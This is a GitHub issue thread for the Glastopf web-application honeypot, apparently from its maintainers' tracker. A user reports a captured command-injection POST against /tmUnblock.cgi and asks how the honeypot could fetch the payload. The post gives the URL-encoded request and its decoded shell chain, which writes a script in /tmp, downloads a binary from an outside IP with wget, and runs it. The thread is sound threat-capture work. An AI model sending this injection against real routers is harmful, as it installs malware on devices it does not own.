search

mushorg / glastopf

Web Application Honeypot
http://glastopf.org
560 stars 168 forks source link

Shell commands in POST not executing #193

Closed bond-alexander closed 9 years ago

bond-alexander commented 10 years ago

Over the past few days, my Glastopf instance has been seeing more command injection attempts designed to download and execute a file. However, Glastopf itself doesn't recognize the attack and doesn't try to download the payload.

Example POST:

POST /tmUnblock.cgi HTTP/1.1
Content-Length: 1036

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%32%39%65%37%38%39%62%39%20%68%74%74%70%3a%2f%2f%31%30%31%2e%37%38%2e%32%34%36%2e%31%38%37%3a%33%32%30%30%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%32%39%65%37%38%39%62%39%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%32%39%65%37%38%39%62%39%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2e%32%39%65%37%38%39%62%39%22%20%3e%3e%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%32%39%65%37%38%39%62%39%2e%73%68%3b%2e%2f%2e%32%39%65%37%38%39%62%39%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31

Which decodes to:

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .29e789b9.sh;echo "wget -O .29e789b9 http://101.78.246.187:3200" >> .29e789b9.sh;echo "chmod +x .29e789b9" >> .29e789b9.sh;echo "./.29e789b9" >> .29e789b9.sh;echo "rm .29e789b9" >> .29e789b9.sh;chmod +x .29e789b9.sh;./.29e789b9.sh`&StartEPI=1

I see the same POST appear repeatedly, with different remote IPs (same port) and different filenames.

What can we do to get Glastopf to safely execute the code and retrieve the file?

glaslos commented 10 years ago

Generally you want to separate the bash from the parameters. Quick and dirty would be a regex for an URL/IP:Port in the parameters. If you get the full bash command, you can also execute it in kippo.

glaslos commented 9 years ago

Assuming this to be answered, closing the issue.